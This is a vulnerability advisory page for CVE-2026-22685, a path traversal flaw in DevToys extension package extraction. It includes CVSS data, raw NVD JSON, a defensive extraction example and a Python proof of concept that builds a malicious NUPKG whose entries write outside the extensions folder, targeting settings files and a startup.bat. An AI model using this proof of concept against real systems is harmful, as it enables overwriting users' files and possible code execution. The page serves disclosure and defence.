Security Vulnerability Report
CVE-2026-22685 CVSS 8.8 HIGH

CVE-2026-22685

Published: 2026-01-10 06:15:52
Last Modified: 2026-03-12 19:20:51

Description

DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../…/target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user’s system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or system files. This issue has been patched in version 2.0.9.0.
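The check whose absence the description identifies, as an added example (this is not DevToys code; the function names and the sample archive are constructed here): an extraction routine that refuses any archive entry whose normalised path does not resolve inside the destination directory, covering absolute paths, backslash separators and `..` segments, and returns what it extracted and what it rejected.

```python
#!/usr/bin/env python3
# Added example, not DevToys project code: validate archive entry paths
# before extraction, the class of check CVE-2026-22685 describes as missing.
# is_contained, safe_extract and build_sample_archive are constructed names.
import io
import os
import tempfile
import zipfile


def is_contained(dest_dir: str, member_name: str) -> bool:
    """Return True only if member_name, joined to dest_dir, stays inside dest_dir.

    Rejects backslash separators (a Windows extractor treats them as directory
    separators), absolute paths and drive letters, and any '..' segment that
    escapes the destination once the path is resolved.
    """
    if "\\" in member_name:
        return False
    if member_name.startswith("/") or os.path.splitdrive(member_name)[0]:
        return False
    dest_real = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest_real, member_name))
    # commonpath is the containment test; a plain startswith() would accept
    # "extensions-evil" as lying inside "extensions".
    return os.path.commonpath([dest_real, target]) == dest_real


def safe_extract(archive_bytes: bytes, dest_dir: str) -> tuple[list[str], list[str]]:
    """Extract only entries that pass is_contained; return (extracted, rejected)."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not is_contained(dest_dir, info.filename):
                rejected.append(info.filename)
                continue
            target = os.path.join(dest_dir, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed in-memory archive: two legitimate entries, three escaping ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DevToys.Extensions.Sample.nuspec", "<package/>")
        zf.writestr("lib/net8.0/Sample.dll", b"\x00")
        zf.writestr("../../escape.txt", b"escaped")
        zf.writestr("/etc/escape.txt", b"escaped")
        zf.writestr("lib\\..\\..\\escape.txt", b"escaped")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Run safe_extract against the constructed archive in a throwaway directory."""
    with tempfile.TemporaryDirectory() as dest:
        return safe_extract(build_sample_archive(), dest)


if __name__ == "__main__":
    extracted, rejected = demo()
    print("extracted:", extracted)
    print("rejected:", rejected)
```

The containment test resolves both sides with os.path.realpath and compares with os.path.commonpath rather than a string prefix, so a destination named extensions is not fooled by an entry that resolves to extensions-evil, and symlinked destination directories compare correctly.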

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:devtoys:devtoys:*:*:*:*:*:*:*:* - VULNERABLE
DevToys 2.0.0.0 - 2.0.8.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-22685 Path Traversal PoC
# Target: DevToys Extension Installation (NUPKG)
# This PoC demonstrates creating a malicious NUPKG with path traversal
import zipfile
import os
import sys


def create_malicious_nupkg(output_path):
    """
    Create a malicious NUPKG file containing path traversal entries
    This can overwrite arbitrary files when extracted by DevToys < 2.0.9.0
    """
    malicious_content = b'{"malicious": "config", "exec": "calc.exe"}'

    # Path traversal payload to write outside extensions directory
    # The ../../ sequence traverses up from the extensions folder
    traversal_paths = [
        '../../AppData/Roaming/DevToys/settings.json',
        '../../AppData/Local/DevToys/startup_config.json',
        '../../startup.bat'
    ]

    with zipfile.ZipFile(output_path, 'w') as nupkg:
        # Add legitimate extension manifest (XML prolog must be the first bytes)
        nupkg.writestr('DevToys.Extensions.TestExtension.nuspec', '''<?xml version="1.0"?>
<package>
  <metadata>
    <id>DevToys.Extensions.TestExtension</id>
    <version>1.0.0</version>
    <description>Malicious extension for CVE-2026-22685 PoC</description>
  </metadata>
</package>
''')

        # Add malicious files with path traversal
        for path in traversal_paths:
            nupkg.writestr(path, malicious_content)
            print(f'[+] Added malicious entry: {path}')

    print(f'[+] Created malicious NUPKG: {output_path}')
    print('[!] When extracted by DevToys < 2.0.9.0, files will be written outside extensions directory')


if __name__ == '__main__':
    if len(sys.argv) > 1:
        create_malicious_nupkg(sys.argv[1])
    else:
        create_malicious_nupkg('malicious-extension.1.0.0.nupkg')

References

https://github.com/DevToys-app/DevToys/commit/02fb7d46d9c663a4ee6ed968baa6a8810405047f (Patch)
https://github.com/DevToys-app/DevToys/pull/1643 (Issue Tracking, Patch)
https://github.com/DevToys-app/DevToys/security/advisories/GHSA-ggxr-h6fm-p2qh (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22685",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T06:15:51.743",
    "lastModified": "2026-03-12T19:20:51.123",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../…/target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user’s system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or system files. This issue has been patched in version 2.0.9.0."
      },
      {
        "lang": "es",
        "value": "DevToys es una aplicación de escritorio para desarrolladores. En versiones desde la 2.0.0.0 hasta antes de la 2.0.9.0, existe una vulnerabilidad de salto de ruta en el mecanismo de instalación de extensiones de DevToys. Al procesar paquetes de extensiones (archivos NUPKG), DevToys no valida suficientemente las rutas de archivo contenidas dentro del archivo. Un paquete de extensión malicioso podría incluir entradas de archivo manipuladas como ../../…/target-file, haciendo que el proceso de extracción escriba archivos fuera del directorio de extensiones previsto. Esta falla permite a un atacante sobrescribir archivos arbitrarios en el sistema del usuario con los privilegios del proceso de DevToys. Dependiendo del entorno, esto puede llevar a la ejecución de código, la manipulación de la configuración o la corrupción de archivos de aplicación o del sistema. Este problema ha sido parcheado en la versión 2.0.9.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-22"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:devtoys:devtoys:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.0.1.0",
                "versionEndExcluding": "2.0.9.0",
                "matchCriteriaId": "1E05DD68-AE09-4AC6-9496-27EE7C537F64"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/DevToys-app/DevToys/commit/02fb7d46d9c663a4ee6ed968baa6a8810405047f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/DevToys-app/DevToys/pull/1643",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/DevToys-app/DevToys/security/advisories/GHSA-ggxr-h6fm-p2qh",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}